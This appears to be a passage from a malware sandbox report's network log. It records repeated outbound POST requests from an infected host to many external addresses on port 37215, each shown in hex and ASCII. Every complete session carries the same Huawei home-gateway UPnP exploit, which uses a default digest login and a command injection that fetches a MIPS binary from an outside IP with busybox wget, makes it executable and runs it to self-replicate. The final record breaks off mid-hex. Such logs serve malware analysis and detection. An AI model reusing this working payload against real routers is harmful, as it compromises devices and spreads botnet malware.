                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1038192.168.2.1348488197.6.212.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431262970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1039192.168.2.136072841.75.139.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431274891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1040192.168.2.1335382197.239.142.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431277990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1041192.168.2.1356352157.82.78.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431296110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1042192.168.2.1347348157.82.89.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431313992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1043192.168.2.1357068197.163.153.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431350946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1044192.168.2.134738688.113.172.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431391001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1045192.168.2.1345232197.29.92.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431394100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1046192.168.2.1338568157.147.95.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431422949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1047192.168.2.1355100157.108.228.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.431447029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 